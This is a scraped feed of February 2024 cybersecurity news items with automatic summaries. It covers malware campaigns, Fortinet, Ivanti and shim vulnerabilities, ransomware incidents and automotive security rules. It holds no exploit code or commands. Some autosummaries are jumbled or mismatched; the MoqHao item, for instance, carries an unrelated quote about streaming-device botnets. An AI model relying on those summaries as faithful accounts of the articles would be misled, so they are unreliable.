            The post Cybersecurity teams recognized as key enablers of business goals appeared first on Help Net Security.

            "

            Autosummary: Positive impact of security teams on business goals: When it comes to the impact of security teams on business success, 74% believe security teams enable business goals as well as personal work objectives (77%), with just 7% of respondents stating their cybersecurity team has had an overall negative impact on their working experience. Interestingly, the research suggests that while, ultimately, security teams are responsible for the maintenance of a positive security culture, workers feel a sense of responsibility for protecting their employer’s data. "


            Raspberry Robin Malware Upgrades with Discord Spread and New Exploits

            exploits
            2024-02-09 https://thehackernews.com/2024/02/raspberry-robin-malware-upgrades-with.html
            The operators of Raspberry Robin are now using two new one-day exploits to achieve local privilege escalation, even as the malware continues to be refined and improved to make it stealthier than before. This means that "Raspberry Robin has access to an exploit seller or its authors develop the exploits themselves in a short period of time," Check Point said in a report this "

            Autosummary: Attributed to a threat actor named Storm-0856 (previously DEV-0856), it's propagated via several entry vectors, including infected USB drives, with Microsoft describing it as part of a "complex and interconnected malware ecosystem" with ties to other e-crime groups like Evil Corp, Silence, and TA505. "


            MoqHao Android Malware Evolves with Auto-Execution Capability

            exploits
            2024-02-09 https://thehackernews.com/2024/02/new-variant-of-moqhao-android-malware.html
            Threat hunters have identified a new variant of Android malware called MoqHao that automatically executes on infected devices without requiring any user interaction. "Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution," McAfee Labs said in a report published this week. "While the app is "

            Autosummary: "Once installed, these devices transform into operational nodes within their illicit streaming media platform, catering to services like traffic proxying, DDoS attacks, OTT content provision, and pirate traffic," QiAnXin researchers said. "


            New Coyote Trojan Targets 61 Brazilian Banks with Nim-Powered Attack

            financial exploits latam
            2024-02-09 https://thehackernews.com/2024/02/new-coyote-trojan-targets-61-brazilian.html
            Sixty-one banking institutions, all of them originating from Brazil, are the target of a new banking trojan called Coyote. "This malware utilizes the Squirrel installer for distribution, leveraging Node.js and a relatively new multi-platform programming language called Nim as a loader to complete its infection," Russian cybersecurity firm Kaspersky said in a Thursday report. What "

            Autosummary: The malicious dynamic-link library, named "libcef.dll," is side-loaded by means of a legitimate executable named "obs-browser-page.exe," which is also included in the Node.js project. "


            Fortinet Warns of Critical FortiOS SSL VPN Flaw Likely Under Active Exploitation

            exploits
            2024-02-09 https://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html
            Fortinet has disclosed a new critical security flaw in FortiOS SSL VPN that it said is likely being exploited in the wild. The vulnerability, CVE-2024-21762 (CVSS score: 9.6), allows for the execution of arbitrary code and commands. "An out-of-bounds write vulnerability [CWE-787] in FortiOS may allow a remote unauthenticated attacker to execute arbitrary code or command via specially "

            Autosummary: FortiOS 7.4 (versions 7.4.0 through 7.4.2): Upgrade to 7.4.3 or above. FortiOS 7.2 (versions 7.2.0 through 7.2.6): Upgrade to 7.2.7 or above. FortiOS 7.0 (versions 7.0.0 through 7.0.13): Upgrade to 7.0.14 or above. FortiOS 6.4 (versions 6.4.0 through 6.4.14): Upgrade to 6.4.15 or above. FortiOS 6.2 (versions 6.2.0 through 6.2.15): Upgrade to 6.2.16 or above. FortiOS 6.0 (all versions): Migrate to a fixed release. The development comes as Fortinet issued patches for CVE-2024-23108 and CVE-2024-23109, impacting FortiSIEM supervisor, allowing a remote unauthenticated attacker to execute unauthorized commands via crafted API requests. "


            Wazuh in the Cloud Era: Navigating the Challenges of Cybersecurity

            ciber
            2024-02-09 https://thehackernews.com/2024/02/wazuh-in-cloud-era-navigating.html
            Cloud computing has innovated how organizations operate and manage IT operations, such as data storage, application deployment, networking, and overall resource management. The cloud offers scalability, adaptability, and accessibility, enabling businesses to achieve sustainable growth. However, adopting cloud technologies into your infrastructure presents various cybersecurity risks and "

            Autosummary: The rise of cloud computing: Cloud computing deploys services, including servers, storage, software, databases, networking, and intelligence over the Internet ("the cloud") to offer flexible resources, faster innovation, and cost efficiencies. We will also delve into how Wazuh, a cybersecurity solution supporting cloud platforms like Amazon Web Services (AWS), Microsoft Azure, GitHub, and Google Cloud Platform (GCP), can help address these challenges effectively. Challenges of cloud computing: While cloud computing offers numerous benefits, such as cost savings, increased efficiency, and seamless collaboration, it also introduces unique cybersecurity challenges. Wazuh systematically examines monitored endpoints, verifying adherence to PCI-DSS, HIPAA, NIST, TSC, CIS, and other applicable regulations. It offers flexibility in integrating with various cloud solution providers, including Amazon Web Services, Microsoft Azure, and Google Cloud, while delivering comprehensive visibility and robust security capabilities. "


            Ransomware payments hit a record high in 2023 – Week in security with Tony Anscombe

            exploits
            2024-02-09 https://www.welivesecurity.com/en/videos/ransomware-payments-record-week-security-tony-anscombe/
            Called a "watershed year for ransomware", 2023 marked a reversal from the decline in ransomware payments observed in the previous year "

            Autosummary: "


            Exploiting a vulnerable Minifilter Driver to create a process killer

            exploits
            2024-02-09 https://securityaffairs.com/158926/hacking/process-killer-with-minifilter-driver.html
            Researcher demonstrated how to exploit a signed Minifilter Driver in a BYOVD attack to terminate a specific process from the kernel. Exploiting a signed Minifilter Driver that can be used in a BYOVD attack to build a program able to terminate a specific process from the kernel. Exploiting a vulnerable Minifilter Driver to create […] "

            Autosummary: but I’m unsure if it is exploitable or not 🙂 This analysis and other interesting posts are available here: https://antonioparata.blogspot.com/2024/02/exploiting-vulnerable-minifilter-driver.html About the author: Antonio Parata, Principal Security Researcher at CrowdStrike. Pierluigi Paganini February 09, 2024. Researcher demonstrated how to exploit a signed Minifilter Driver in a BYOVD attack to terminate a specific process from the kernel. When our process exits, the PsSetCreateProcessNotifyRoutine notification callback will be called, the PID check will be satisfied by verifying that the variable it_s_a_me equals the process ID that is exiting, triggering the ZwTerminateProcess on the process_handle_to_terminate process. "


            Black Basta ransomware gang hacked Hyundai Motor Europe

            exploits ransomware
            2024-02-09 https://securityaffairs.com/158916/data-breach/black-basta-ransomware-hyundai-motor-europe.html
            Black Basta ransomware gang claims the hack of the car maker Hyundai Motor Europe and the theft of three terabytes of their data. BleepingComputer reported that the Car maker Hyundai Motor Europe was breached by the Black Basta ransomware gang. The threat actors claim to have stolen three terabytes of data from the company. In […] "

            Autosummary: The crooks provided Bleeping Computer with evidence of the data breach; it seems that the gang stole data from various departments, including legal, sales, and human resources. "


            Fortinet warns of a new actively exploited RCE flaw in FortiOS SSL VPN

            exploits
            2024-02-09 https://securityaffairs.com/158908/hacking/fortinet-fortios-rce-exploitation.html
            Fortinet warns that the recently discovered critical remote code execution flaw in FortiOS SSL VPN, tracked CVE-2024-21762, is being actively exploited. Fortinet is warning that the recently discovered critical remote code execution vulnerability in FortiOS SSL VPN, tracked as CVE-2024-21762 (CVSS score 9.6), is actively exploited in attacks in the wild. The security firm did not provide […] "

            Autosummary: Fortinet warns of a new actively exploited RCE flaw in FortiOS SSL VPN Pierluigi Paganini February 09, 2024 Fortinet warns that the recently discovered critical remote code execution flaw in FortiOS SSL VPN, tracked as CVE-2024-21762, is being actively exploited. "


            Fortinet warns of new FortiSIEM RCE bugs in confusing disclosure

            exploits
            2024-02-08 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortisiem-rce-bugs-in-confusing-disclosure/
            Fortinet is warning of two new unpatched patch bypasses for a critical remote code execution vulnerability in FortiSIEM, Fortinet's SIEM solution. [...] "

            Autosummary: While the original flaw, CVE-2023-34992, was fixed in a previous FortiSIEM release, the new variants will be fixed or have been fixed in the following versions: FortiSIEM version 7.1.2 or above; upcoming FortiSIEM version 7.2.0 or above; upcoming FortiSIEM version 7.0.3 or above; upcoming FortiSIEM version 6.7.9 or above; upcoming FortiSIEM version 6.6.5 or above; upcoming FortiSIEM version 6.5.3 or above; upcoming FortiSIEM version 6.4.4 or above. As this is a critical flaw, it is strongly advised that you upgrade to one of the above FortiSIEM versions as soon as they become available. "


            Data breaches at Viamedis and Almerys impact 33 million in France

            financial
            2024-02-08 https://www.bleepingcomputer.com/news/security/data-breaches-at-viamedis-and-almerys-impact-33-million-in-france/
            Data breaches at two French healthcare payment service providers, Viamedis and Almerys, have now been determined to impact over 33 million people in the country. [...] "

            Autosummary: The company said the exposure includes names, dates of birth, insurer details, social security numbers, marital status, civil status, and guarantees open to third-party payment. "


            Hyundai Motor Europe hit by Black Basta ransomware attack

            exploits ransomware
            2024-02-08 https://www.bleepingcomputer.com/news/security/hyundai-motor-europe-hit-by-black-basta-ransomware-attack/
            Car maker Hyundai Motor Europe suffered a Black Basta ransomware attack, with the threat actors claiming to have stolen three terabytes of corporate data. [...] "

            Autosummary: While it is not known what data was stolen, the folder names indicate it's related to various departments at the company, including legal, sales, human resources, accounting, IT, and management. "


            Ivanti: Patch new Connect Secure auth bypass bug immediately

            exploits
            2024-02-08 https://www.bleepingcomputer.com/news/security/ivanti-patch-new-connect-secure-auth-bypass-bug-immediately/
            Today, Ivanti warned of a new authentication bypass vulnerability impacting Connect Secure, Policy Secure, and ZTA gateways, urging admins to secure their appliances immediately. [...] "

            Autosummary: "


            Android XLoader malware can now auto-execute after installation

            exploits
            2024-02-08 https://www.bleepingcomputer.com/news/security/android-xloader-malware-can-now-auto-execute-after-installation/
            A new version of the XLoader Android malware was discovered that automatically executes on devices it infects, requiring no user interaction to launch. [...] "

            Autosummary: XLoader, aka MoqHao, is an Android malware operated and likely created by a financially motivated threat actor named "Roaming Mantis," previously seen targeting users in the U.S., U.K., Germany, France, Japan, South Korea, and Taiwan. The pop-up messages used in this step are available in English, Korean, French, Japanese, German, and Hindi, which indicates XLoader's current targets. "


            US offers $10 million for tips on Hive ransomware leadership

            exploits ransomware
            2024-02-08 https://www.bleepingcomputer.com/news/security/us-offers-10-million-for-tips-on-hive-ransomware-leadership/
            The U.S. State Department offers rewards of up to $10 million for information that could help locate, identify, or arrest members of the Hive ransomware gang. [...] "

            Autosummary: "Since late July 2022, the FBI has penetrated Hive's computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded," the Justice Department said. "


            New Fortinet RCE flaw in SSL VPN likely exploited in attacks

            exploits
            2024-02-08 https://www.bleepingcomputer.com/news/security/new-fortinet-rce-flaw-in-ssl-vpn-likely-exploited-in-attacks/
            Fortinet is warning that a new critical remote code execution vulnerability in FortiOS SSL VPN is potentially being exploited in attacks. [...] "

            Autosummary: "


            Round 3! The toothbrush DDoS attack saga continues: Newspaper counters Fortinet’s translation claim in contentious interview

            ransomware
            2024-02-08 https://grahamcluley.com/round-3-in-the-toothbrush-ddos-debacle/
            We thought it was all over... but a Swiss newspaper has come out fighting, blaming Fortinet for spreading untruths about a toothbrush botnet. Will Fortinet return for Round 4, or is this a knockout punch? "

            Autosummary: Here’s what the newspaper has said (computer-translated for those of us who don’t understand German): What is now described by the Fortinet headquarters in California as a “translation problem” was presented to the researchers in a completely different way: Swiss Fortinet representatives described the toothbrush case as a real DDoS attack at a meeting that dealt with current threat situations. "


            Smashing Security podcast #358: Hong Kong hijinks, pig butchers, and poor ransomware gangs

            exploits ransomware
            2024-02-08 https://grahamcluley.com/smashing-security-podcast-358/
            Is this the real life? Is this just fantasy? A company in Hong Kong suffers a sophisticated deepfake duping, be on your guard from pig butchers as Valentine's Day approaches, and spare a moment to feel sorry for poor ransomware gangs. All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Lianne Potter from the "Compromising Positions" podcast. "

            Autosummary: Hosts: Graham Cluley (@gcluley), Carole Theriault (@caroletheriault). Guest: Lianne Potter (@Tech_Soapbox). Episode links: Sponsored by Kolide. Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "


            US offers $10 million reward for info on Hive ransomware group leaders

            exploits ransomware
            2024-02-08 https://securityaffairs.com/158871/cyber-crime/10m-reward-hive-ransomware-group.html
            U.S. Government offers rewards of up to $10 million for information that could help locate, identify, or arrest members of the Hive ransomware group. The US Department of State announced rewards up to $10,000,000 for information leading to the identification and/or location of the leaders of the Hive ransomware group. The US government also offers […] "

            Autosummary: The authorities reported that from June 2021 through at least November 2022, threat actors targeted a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). "


            Brazil's ex-leader Bolsonaro surrenders passport

            latam
            2024-02-08 https://www.bbc.co.uk/news/world-latin-america-68239341
            Jair Bolsonaro denies claims that he was involved in a plot to keep him in power. "

            Autosummary: "


            Celebrity chefs targeted in identity cloning scam

            financial
            2024-02-08 https://www.bbc.co.uk/news/uk-68156910
            Heston Blumenthal and Yotam Ottolenghi among those affected by new identity fraud, BBC finds. "

            Autosummary: "


            "People will keep dying": Fentanyl crisis grips Mexico's border cities

            latam
            2024-02-07 https://www.bbc.co.uk/news/world-latin-america-68101263
            More Mexicans are consuming the deadly drug, leading to a spike in overdoses. "

            Autosummary: "


            Cybersecurity teams hesitate to use automation in TDIR workflows

            ciber
            2024-02-07 https://www.helpnetsecurity.com/2024/02/07/tdir-improvements-in-security-operations/

            Despite reported threat detection, investigation, and response (TDIR) improvements in security operations, more than half of organizations still experienced significant security incidents in the last year, according to Exabeam. North America experienced the highest rate of security incidents (66%), closely followed by Western Europe (65%), then Asia Pacific and Japan (APJ) (34%). Gap between self-reported security measures and reality: The findings reveal a significant gap between self-reported security measures and reality. Despite 57% of interviewed … More

            The post Cybersecurity teams hesitate to use automation in TDIR workflows appeared first on Help Net Security.

            "

            Autosummary: Despite 57% of interviewed organizations reporting significant security incidents, over 70% of organizations reported better performance on cybersecurity key performance indicators (KPIs), such as mean time to detect, investigate, respond, and remediate in 2023 as compared to 2022, and 90% believe they have good or excellent ability to detect cyberthreats. "


            Chinese Hackers Exploited FortiGate Flaw to Breach Dutch Military Network

            exploits
            2024-02-07 https://thehackernews.com/2024/02/chinese-hackers-exploited-fortigate.html
            Chinese state-backed hackers broke into a computer network that's used by the Dutch armed forces by targeting Fortinet FortiGate devices. "This [computer network] was used for unclassified research and development (R&D)," the Dutch Military Intelligence and Security Service (MIVD) said in a statement. "Because this system was self-contained, it did not lead to any damage to the "

            Autosummary: "


            Critical JetBrains TeamCity On-Premises Flaw Exposes Servers to Takeover - Patch Now

            government
            2024-02-07 https://thehackernews.com/2024/02/critical-jetbrains-teamcity-on-premises.html
            JetBrains is alerting customers of a critical security flaw in its TeamCity On-Premises continuous integration and continuous deployment (CI/CD) software that could be exploited by threat actors to take over susceptible instances. The vulnerability, tracked as CVE-2024-23917, carries a CVSS rating of 9.8 out of 10, indicative of its severity. "The vulnerability may enable an unauthenticated "

            Autosummary: "


            China-linked APT deployed malware in a network of the Dutch Ministry of Defence

            exploits
            2024-02-07 https://securityaffairs.com/158765/apt/china-linked-apt-dutch-mod.html
            China-linked APT group breached the Dutch Ministry of Defence last year and installed malware on compromised systems. Dutch Military Intelligence and Security Service (MIVD) and the General Intelligence and Security Service (AIVD) published a joint report warning that a China-linked APT group breached the Dutch Ministry of Defence last year. The effects of the attack were limited because […] "

            Autosummary: In December 2023, Fortinet urged its customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices. "


            Facebook fatal accident scam still rages on

            financial
            2024-02-07 https://www.malwarebytes.com/blog/news/2024/02/facebook-fatal-accident-scam-still-rages-on
            We look at a scam campaign on Facebook that continues to do the rounds, and how you can recover your compromised account. "

            Autosummary: Other blocks we encountered during our research: Malwarebytes Premium blocks 188.114.96.0; Malwarebytes Premium blocks the subdomain oyglk.altairaquilae.top. How to recover from a Facebook scam: You can recognize this type of scam because they usually tag several friends of the victim. These browser push notifications are a very annoying type of advertising, often associated with tech support scams, explicit content, gambling, and anything else that pays a handsome referral bonus. First Facebook scam. Translation: Deadly accident on highway causes several fatalities. Notable about this one is that it was posted as a fundraiser and does not allow comments, which blocks me from posting a warning that this is a scam. "


            The fight against commercial spyware misuse is heating up

            Linux
            2024-02-07 https://www.helpnetsecurity.com/2024/02/07/fight-against-commercial-spyware/

            Though there are organizations out there investigating how commercial spyware is misused to target journalists, human rights defenders and dissidents, the growing market related to the development and sale of this type of software and the exploits used to deploy it is still very much shrouded in mystery. “While prominent [commercial spyware vendors] garner public attention and headlines, there are dozens of others that are less noticed, but play an important role in developing spyware,” … More

            The post The fight against commercial spyware misuse is heating up appeared first on Help Net Security.

            "

            Autosummary: In related news, on Monday, US Secretary of State Antony Blinken announced that the State Department is implementing a new policy that will allow the imposition of visa restrictions on: individuals involved in the misuse of commercial spyware to surveil, harass, or intimidate “journalists, activists, other persons perceived to be dissidents for their work, members of marginalized communities or vulnerable populations, or the family members of these targeted individuals”; and individuals believed to facilitate or derive financial benefit from such misuse of commercial spyware (e.g., commercial spyware vendors and brokers). "


            DynaRisk Cyber Intelligence Data Lake enhances the accuracy of data breach predictions

            financial
            2024-02-07 https://www.helpnetsecurity.com/2024/02/07/dynarisk-cyber-intelligence-data-lake/

            DynaRisk launched Cyber Intelligence Data Lake. This major feature upgrade propels the company’s capabilities in preventing and predicting hacker activity. DynaRisk’s Cyber Intelligence Data Lake is a leap forward in the cyber risk management landscape, offering next-generation intelligence quickly and at scale. DynaRisk’s new Data Lake contains vast amounts of recovered data stolen by Infostealer malware. The company has intelligence on 6 million hacked devices, 20 million stolen credentials, 30 million stolen emails and 11 … More

            The post DynaRisk Cyber Intelligence Data Lake enhances the accuracy of data breach predictions appeared first on Help Net Security.

            "

            Autosummary: Infostealers, which played a pivotal role in high-profile cyber incidents such as the MGM attack, are types of malware engineered to extract sensitive information such as clear text passwords, website cookies, credit cards, crypto wallets, documents and other data from hacked PCs and phones, often covering their tracks to avoid detection. "


            On-premises JetBrains TeamCity servers vulnerable to auth bypass (CVE-2024-23917)

            government
            2024-02-07 https://www.helpnetsecurity.com/2024/02/07/cve-2024-23917/

            JetBrains has patched a critical authentication bypass vulnerability (CVE-2024-23917) affecting TeamCity On-Premises continuous integration and deployment servers. About CVE-2024-23917: CVE-2024-23917 could allow an unauthenticated threat actor with HTTP(S) access to a TeamCity server to bypass authentication controls and gain administrative privileges on the server. The vulnerability was first identified and reported by an external security researcher on January 19, 2024, and affects all versions of TeamCity On-Premises from 2017.1 through 2023.11.2. “We have fixed this … More

            The post On-premises JetBrains TeamCity servers vulnerable to auth bypass (CVE-2024-23917) appeared first on Help Net Security.

            "

            Autosummary: "


            Ivanti Connect Secure flaw massively exploited by attackers (CVE-2024-21893)

            exploits
            2024-02-07 https://www.helpnetsecurity.com/2024/02/07/cve-2024-21893-exploited/

            CVE-2024-21893, a server-side request forgery (SSRF) vulnerability affecting Ivanti Connect Secure VPN gateways and Policy Secure (a network access control solution), is being exploited by attackers. About CVE-2024-21893: CVE-2024-21893 allows attackers to bypass authentication requirements and access certain restricted resources on vulnerable solutions. It affects the SAML component of: Ivanti Connect Secure (9.x, 22.x); Ivanti Policy Secure (9.x, 22.x); Ivanti Neurons for ZTA (SaaS-delivered zero trust network access solution). Its existence, along with that … More

            The post Ivanti Connect Secure flaw massively exploited by attackers (CVE-2024-21893) appeared first on Help Net Security.

            "

            Autosummary: "


            Cybersecurity in the automotive industry: Ensuring compliance with UNECE regulations

            industry ciber
            2024-02-07 https://ics-cert.kaspersky.com/publications/cybersecurity-in-the-automotive-industry-ensuring-compliance-with-unece-regulations/
            What UN Regulations 155 and 156 require from vehicle manufacturers in reality, and how to ensure compliance with requirements and prepare for certification if necessary "

            Autosummary: The table below presents a list of vehicle categories covered by the requirements of UN Regulations 155 and 156:

            Vehicle category | Category description | Applicable requirements
            L6 | Four-wheeled vehicles with a mass not exceeding 350 kg, engine displacement of 50 cc or less, and maximum design speed of 45 km/h | UN 155, if the vehicle complies with Level 3 automation or higher
            L7 | Four-wheeled vehicles with a mass not exceeding 400 kg and maximum continuous rated power of no more than 15 kW | UN 155, if the vehicle complies with Level 3 automation or higher
            M | Vehicles with four or more wheels, designed to carry passengers | UN 155 and UN 156
            N | Vehicles with four or more wheels, designed to carry cargo | UN 155 and UN 156
            O | Trailers with at least one ECU | UN 155 and UN 156
            R | Agricultural trailers | UN 156
            S | Interchangeable towed agricultural and logging equipment | UN 156
            T | Any motorized, wheeled, or tracked agricultural equipment with at least two wheeled axles, capable of moving faster than 6 km/h | UN 156

            Starting in July 2024, UN Regulations 155 and 156 will become mandatory not only for new types of vehicles, but also for all new vehicles produced.

            The automotive industry has a geographically and hierarchically distributed and functionally complex supply chain that includes: the vehicle manufacturer itself (OEM – Original Equipment Manufacturer); suppliers of individual vehicle systems and modules (Tier 1 suppliers), such as the gearbox, infotainment module, or engine control unit; their suppliers that make the individual components of the systems and modules, for example, microcircuits, sensors, controllers, operating systems, bearings, actuators, etc. The broad range of functions (engine control, fuel system control, passenger safety, autopilot, infotainment system), architectures of communication interfaces used by individual components (CAN, LIN, Ethernet, Wi-Fi), and communication links with external services and entities (Bluetooth, Wi-Fi, LTE) create a huge cyberattack surface in vehicles.

            Risks for the manufacturer’s ICT infrastructure
            A vehicle manufacturer is an industrial organization whose structure combines the ordinary ICT infrastructure of a back office, i.e., auxiliary and supporting business units (accounting department, legal department, logistical support for the office, etc.), with the infrastructure of the development unit, the production segment, and the servers of the supporting infrastructure. The consequences of a successful attack on a vehicle may include the theft or modification of data (personal data, payment information, and other user data), installation of malicious code/firmware, disruption or manipulation of individual vehicle functions, theft of the vehicle, physical damage to the vehicle, and injury or death of drivers, passengers, and pedestrians.

            Relevant cybersecurity risks
            In the automotive industry, cybersecurity requirements apply at least to the following objects: the product itself, that is, the vehicle and its components; supporting infrastructure, for example, servers for updating the firmware of electronic control units (ECU); the manufacturer’s ICT infrastructure, whose security is important for the development, manufacture, and subsequent support of products; the supply chain of a vehicle’s individual electronic components and systems.

            Production phase
            According to ISO 21434, when the production phase begins, it is necessary to analyze all production operations and develop a production control plan that includes: a description of the steps to implement the cybersecurity requirements for the production, operation and maintenance, and decommissioning phases (the standard combines these phases into a single post-development phase); a list of equipment and tools for the production phase; security controls to prevent unauthorized changes in production; procedures for evaluating the completeness of implementation and validating the security requirements for the production, operation and maintenance, and decommissioning phases. To maintain the cybersecurity of the vehicle, it is necessary to: monitor information about discovered vulnerabilities and changes in the threat landscape; establish security monitoring of the supporting infrastructure and incident response processes; establish monitoring of information about compromised suppliers and processes for responding to incidents involving supply chains and trusted (authorized) partners; rapidly respond to vulnerabilities, threats and incidents, including developing and installing patches, notifying users, and reassessing risks.

            The following are examples of attacks on supporting infrastructure: uploading and installing a fake update; uploading fake backup copies of data or configurations; sending illegitimate commands from an adversary’s C&C server to a vehicle; an attack on the servers of supporting infrastructure (for example, network management servers for charging stations) and the subsequent leaking of personal data and payment information; changes made while servicing a vehicle at an auto repair shop that result in a breach of security (configuration changes, deployment of a rootkit, etc.). To obtain them, a vehicle manufacturer must demonstrate that the organizational processes listed above comply with the following requirements as part of cybersecurity management and update management: threat assessment and risk analysis (TARA); continuous monitoring, incident detection and response; vulnerability management; component supply chain management and service management; security update management; notification of supervisory bodies regarding the results of cybersecurity monitoring, including any cyberattacks. Risks of attacks on supporting infrastructure can be minimized by implementing a proper network topology and segmentation, secure protocols for authentication, authorization, and data encryption, antivirus protection, procedures for controlling access to the system, vulnerability management, and incident monitoring and response.

            An acceptable option for implementing cybersecurity practices could be the following sequence of steps: establish a cybersecurity management system, i.e., develop and implement basic cybersecurity procedures and policies within the organization; develop a cybersecurity plan that defines the list of protective measures and stages for their implementation; secure the company’s ICT infrastructure by minimizing the risk of attacks on development departments and production sites; secure supporting infrastructure and external services by minimizing the risk of an attack on a vehicle under development or in use; ensure that the project lifecycle meets relevant cybersecurity requirements, from design and secure development to vehicle decommissioning and the recycling of individual components.

            Risk management for the manufacturer’s ICT infrastructure
            When it comes to risk management for the ICT infrastructure, it should be kept in mind that the vehicle manufacturer needs to view the ICT infrastructure as the starting point of complex attacks whose ultimate target is the vehicle, supporting infrastructure, and the data of passengers and vehicle owners (individuals as well as legal entities). According to ISO 26262, the lifecycle of a vehicle project is divided into 5 phases (we will use this division, because the phases defined in ISO 26262 are more detailed than those in ISO 21434): concept phase; product development phase; production phase; operation and maintenance phase; end of cybersecurity support and decommissioning phase. Some functionality (monitoring, secure downloading and installation of updates, user/owner change scenarios, etc.) is implemented in the vehicle, and some is implemented in supporting infrastructure. Three phases are identified in the project lifecycle: the concept phase, the development phase (which includes cybersecurity development and validation) and the post-development phase (which includes production, operation, and maintenance, as well as the end of cybersecurity support and decommissioning).

            Requirements of UNECE and international standards
            UN Regulations 155 and 156 contain top-level requirements that can be divided into two categories: process-oriented requirements, which have to do with security management at the level of the organization, and project-oriented requirements, which have to do with ensuring the security of everything being produced, whether the vehicles themselves or individual systems and components. "


            Critical flaw in Shim bootloader impacts major Linux distros

            Linux
            2024-02-07 https://www.bleepingcomputer.com/news/security/critical-flaw-in-shim-bootloader-impacts-major-linux-distros/
            A critical vulnerability in the Shim Linux bootloader enables attackers to execute code and take control of a target system before the kernel is loaded, bypassing existing security mechanisms. [...] "

            Autosummary: Linux distributions that utilize Shim, such as Red Hat, Debian, Ubuntu, and SUSE, have released advisories with information on the flaw. "


            Ransomware payments reached record $1.1 billion in 2023

            exploits
            2024-02-07 https://www.bleepingcomputer.com/news/security/ransomware-payments-reached-record-11-billion-in-2023/
            Ransomware payments in 2023 soared above $1.1 billion for the first time, shattering previous records and reversing the decline seen in 2022, marking the year as an exceptionally profitable period for ransomware gangs. [...] "

            Autosummary: Regarding the laundering of ransom payments, Chainalysis says that in 2023, ransom payments were primarily passed through mixing services, underground exchanges, instant exchangers, sanctioned entities, and platforms that do not have know-your-customer (KYC) requirements in place. "


            After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back

            industry
            2024-02-07 https://thehackernews.com/2024/02/after-fbi-takedown-kv-botnet-operators.html
            The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity. KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese "

            Autosummary: "We observed the KV-botnet operators begin to restructure, committing eight straight hours of activity on December 8, 2023, nearly ten hours of operations the following day on December 9, 2023, followed by one hour on December 11, 2023," Lumen said in a technical report shared with The Hacker News. "


            Critical Bootloader Vulnerability in Shim Impacts Nearly All Linux Distros

            exploits Linux
            2024-02-07 https://thehackernews.com/2024/02/critical-bootloader-vulnerability-in.html
            The maintainers of shim have released version 15.8 to address six security flaws, including a critical bug that could pave the way for remote code execution under specific circumstances. Tracked as CVE-2023-40547 (CVSS score: 9.8), the vulnerability could be exploited to achieve a Secure Boot bypass. Bill Demirkapi of the Microsoft Security Response Center (MSRC) has been… "

            Autosummary: "


            Experts warn of a critical bug in JetBrains TeamCity On-Premises

            exploits government
            2024-02-07 https://securityaffairs.com/158790/hacking/jetbrains-teamcity-on-premises-bug.html
            A new vulnerability in JetBrains TeamCity On-Premises can be exploited by threat actors to take over vulnerable instances. JetBrains addressed a critical security vulnerability, tracked as CVE-2024-23917 (CVSS score 9.8) in its TeamCity On-Premises continuous integration and continuous deployment (CI/CD) software. An attacker can trigger the vulnerability to take over vulnerable installs. “The vulnerability may […] "

            Autosummary: Pierluigi Paganini, February 07, 2024: A new vulnerability in JetBrains TeamCity On-Premises can be exploited by threat actors to take over vulnerable instances. "


            Critical shim bug impacts every Linux boot loader signed in the past decade

            exploits Linux
            2024-02-07 https://securityaffairs.com/158792/hacking/critical-shim-bug-linux.html
            The maintainers of Shim addressed six vulnerabilities, including a critical flaw that could potentially lead to remote code execution. The maintainers of ‘shim’ addressed six vulnerabilities with the release of version 15.8. The most severe of these vulnerabilities, tracked as CVE-2023-40547 (CVSS score: 9.8), can lead to remote code execution under specific circumstances. The vulnerability CVE-2023-40547 is […] "

            Autosummary: “found a critical bug that exists in every Linux boot loader signed in the past decade 🥰” — Bill Demirkapi (@BillDemirkapi) January 24, 2024. “Discovered and reported by Bill Demirkapi at Microsoft’s Security Response Center, this particular vulnerability stems from HTTP protocol handling, leading to an out-of-bounds write that can lead to complete system compromise.” "


            Critical Cisco bug exposes Expressway gateways to CSRF attacks

            exploits
            2024-02-07 https://www.bleepingcomputer.com/news/security/critical-cisco-bug-exposes-expressway-gateways-to-csrf-attacks/
            Cisco has patched several vulnerabilities affecting its Expressway Series collaboration gateways, two of them rated as critical severity and exposing vulnerable devices to cross-site request forgery (CSRF) attacks. [...] "

            Autosummary: Hackers exploited a second IOS and IOS XE zero-day last year in attacks, a bug that enabled them to execute arbitrary code, gain complete control of vulnerable systems, and trigger denial of service (DoS) conditions. "


            Facebook ads push new Ov3r_Stealer password-stealing malware

            exploits
            2024-02-07 https://www.bleepingcomputer.com/news/security/facebook-ads-push-new-ov3r-stealer-password-stealing-malware/
            A new password-stealing malware named Ov3r_Stealer is spreading through fake job advertisements on Facebook, aiming to steal account credentials and cryptocurrency. [...] "

            Autosummary: At this stage, Trustwave observed four distinct malware loading methods, namely: malicious Control Panel (CPL) files executing remote PowerShell scripts, weaponized HTML files (HTML smuggling) containing base64-encoded ZIP files with malicious contents, LNK files masqueraded as text files but actually acting as download shortcuts, SVG files containing embedded .RAR files (SVG smuggling). "


            The toothbrush DDoS attack: How misinformation spreads in the cybersecurity world

            ciber
            2024-02-07 https://grahamcluley.com/the-toothbrush-ddos-attack-how-misinformation-spreads-in-the-cybersecurity-world/
            No, three million smart toothbrushes didn't launch a DDoS attack against a Swiss company. "

            Autosummary: None of this has stopped numerous newspapers and websites around the world from repeating the “Beware, your electric toothbrush may have been hacked” headlines, because… …well, because it makes such a good story. Here are a few headlines from the last 24 hours or so, about a supposed smart toothbrush botnet launching a distributed denial-of-service (DDoS) attack: And there were many more… The reports were inspired by a report last week in the Swiss newspaper Aargauer Zeitung. "


            Exploring NIST Cybersecurity Framework 2.0

            ciber
            2024-02-06 https://www.helpnetsecurity.com/2024/02/06/nist-cybersecurity-framework-2-0-video/

